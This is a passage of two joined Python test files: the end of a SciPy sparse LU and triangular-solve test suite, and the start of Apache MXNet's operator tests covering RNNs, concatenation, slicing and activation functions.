self._smoketest(splu, check, np.complex64)
self._smoketest(splu, check, np.complex128)
@sup_sparse_efficiency
def test_spilu_smoketest(self):
self._internal_test_spilu_smoketest()
def _internal_test_spilu_smoketest(self):
errors = []
def check(A, b, x, msg=""):
r = A * x
err = abs(r - b).max()
assert_(err < 1e-2, msg)
if b.dtype in (np.float64, np.complex128):
errors.append(err)
self._smoketest(spilu, check, np.float32)
self._smoketest(spilu, check, np.float64)
self._smoketest(spilu, check, np.complex64)
self._smoketest(spilu, check, np.complex128)
assert_(max(errors) > 1e-5)
@sup_sparse_efficiency
def test_spilu_drop_rule(self):
# Test passing in the drop_rule argument to spilu.
A = identity(2)
rules = [
b'basic,area'.decode('ascii'), # unicode
b'basic,area', # ascii
[b'basic', b'area'.decode('ascii')]
]
for rule in rules:
# Argument should be accepted
assert_(isinstance(spilu(A, drop_rule=rule), SuperLU))
def test_splu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, splu, A)
def test_spilu_nnz0(self):
A = csc_matrix((5,5), dtype='d')
assert_raises(RuntimeError, spilu, A)
def test_splu_basic(self):
# Test basic splu functionality.
n = 30
rng = random.RandomState(12)
a = rng.rand(n, n)
a[a < 0.95] = 0
# First test with a singular matrix
a[:, 0] = 0
a_ = csc_matrix(a)
# Matrix is exactly singular
assert_raises(RuntimeError, splu, a_)
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
b = ones(n)
x = lu.solve(b)
assert_almost_equal(dot(a, x), b)
def test_splu_perm(self):
# Test the permutation vectors exposed by splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# Check that the permutation indices do belong to [0, n-1].
for perm in (lu.perm_r, lu.perm_c):
assert_(all(perm > -1))
assert_(all(perm < n))
assert_equal(len(unique(perm)), len(perm))
# Now make a symmetric, and test that the two permutation vectors are
# the same
# Note: a += a.T relies on undefined behavior.
a = a + a.T
a_ = csc_matrix(a)
lu = splu(a_)
assert_array_equal(lu.perm_r, lu.perm_c)
def test_lu_refcount(self):
# Test that we are keeping track of the reference count with splu.
n = 30
a = random.random((n, n))
a[a < 0.95] = 0
# Make a diagonal dominant, to make sure it is not singular
a += 4*eye(n)
a_ = csc_matrix(a)
lu = splu(a_)
# And now test that we don't have a refcount bug
import sys
rc = sys.getrefcount(lu)
for attr in ('perm_r', 'perm_c'):
perm = getattr(lu, attr)
assert_equal(sys.getrefcount(lu), rc + 1)
del perm
assert_equal(sys.getrefcount(lu), rc)
def test_bad_inputs(self):
A = self.A.tocsc()
assert_raises(ValueError, splu, A[:,:4])
assert_raises(ValueError, spilu, A[:,:4])
for lu in [splu(A), spilu(A)]:
b = random.rand(42)
B = random.rand(42, 3)
BB = random.rand(self.n, 3, 9)
assert_raises(ValueError, lu.solve, b)
assert_raises(ValueError, lu.solve, B)
assert_raises(ValueError, lu.solve, BB)
assert_raises(TypeError, lu.solve,
b.astype(np.complex64))
assert_raises(TypeError, lu.solve,
b.astype(np.complex128))
@sup_sparse_efficiency
def test_superlu_dlamch_i386_nan(self):
# SuperLU 4.3 calls some functions returning floats without
# declaring them. On i386@linux call convention, this fails to
# clear floating point registers after call. As a result, NaN
# can appear in the next floating point operation made.
#
# Here's a test case that triggered the issue.
n = 8
d = np.arange(n) + 1
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
A = A.astype(np.float32)
spilu(A)
A = A + 1j*A
B = A.A
assert_(not np.isnan(B).any())
@sup_sparse_efficiency
def test_lu_attr(self):
def check(dtype, complex_2=False):
A = self.A.astype(dtype)
if complex_2:
A = A + 1j*A.T
n = A.shape[0]
lu = splu(A)
# Check that the decomposition is as advertized
Pc = np.zeros((n, n))
Pc[np.arange(n), lu.perm_c] = 1
Pr = np.zeros((n, n))
Pr[lu.perm_r, np.arange(n)] = 1
Ad = A.toarray()
lhs = Pr.dot(Ad).dot(Pc)
rhs = (lu.L * lu.U).toarray()
eps = np.finfo(dtype).eps
assert_allclose(lhs, rhs, atol=100*eps)
check(np.float32)
check(np.float64)
check(np.complex64)
check(np.complex128)
check(np.complex64, True)
check(np.complex128, True)
@sup_sparse_efficiency
def test_threads_parallel(self):
oks = []
def worker():
try:
self.test_splu_basic()
self._internal_test_splu_smoketest()
self._internal_test_spilu_smoketest()
oks.append(True)
except:
pass
threads = [threading.Thread(target=worker)
for k in range(20)]
for t in threads:
t.start()
for t in threads:
t.join()
assert_equal(len(oks), 20)
class TestSpsolveTriangular(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
n = 5
A = csr_matrix((n, n))
b = np.arange(n)
for lower in (True, False):
assert_raises(scipy.linalg.LinAlgError, spsolve_triangular, A, b, lower=lower)
@sup_sparse_efficiency
def test_bad_shape(self):
# A is not square.
A = np.zeros((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve_triangular, A, b)
# A2 and b2 have incompatible shapes.
A2 = csr_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve_triangular, A2, b2)
@sup_sparse_efficiency
def test_input_types(self):
A = array([[1., 0.], [1., 2.]])
b = array([[2., 0.], [2., 2.]])
for matrix_type in (array, csc_matrix, csr_matrix):
x = spsolve_triangular(matrix_type(A), b, lower=True)
assert_array_almost_equal(A.dot(x), b)
@sup_sparse_efficiency
def test_random(self):
def random_triangle_matrix(n, lower=True):
A = scipy.sparse.random(n, n, density=0.1, format='coo')
if lower:
A = scipy.sparse.tril(A)
else:
A = scipy.sparse.triu(A)
A = A.tocsr(copy=False)
for i in range(n):
A[i, i] = np.random.rand() + 1
return A
np.random.seed(1234)
for lower in (True, False):
for n in (10, 10**2, 10**3):
A = random_triangle_matrix(n, lower=lower)
for m in (1, 10):
for b in (np.random.rand(n, m),
np.random.randint(-9, 9, (n, m)),
np.random.randint(-9, 9, (n, m)) +
np.random.randint(-9, 9, (n, m)) * 1j):
x = spsolve_triangular(A, b, lower=lower)
assert_array_almost_equal(A.dot(x), b)
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import xfail_when_nonstandard_decimal_separator, with_environment
import pytest
import os
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym._bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn._simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym._bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out._bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out._bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym._simple_bind(ctx=default_context(), data=data_npy.shape)
outputs = exe.forward(is_train=True, data=data_npy)
assert len(exe.outputs) == num_outputs
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
ograd = [mx.nd.array(ele, dtype=outputs[i].dtype) for i, ele in enumerate(out_grads_npy)]
exe.backward(out_grads=ograd)
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s._bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap._bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx._bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
def test_fully_connected():
# Create data of given shape as a uniform distribution centered on 0.0
def random_data(shape, dtype=np.float32):
return mx.nd.random.uniform(low=-0.5,
high=0.5, shape=shape, dtype=dtype)
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = random_data(shape=(5, 5, 5, 13))
fc_weight = random_data(shape=(10, 325))
fc_bias = random_data(shape=(10))
fc_bias2 = random_data(shape=(10, 1))
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np})
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return np.float32(1.0) * (x > np.float32(0.0))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype('float32')
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(ya.shape, dtype=dtype)],
[g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(ya_full.shape, dtype=dtype)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape, dtype=dtype)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 2e-2, 1e-3) if dtype is np.float16 else (1e-4, 1e-3, 1e-5)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
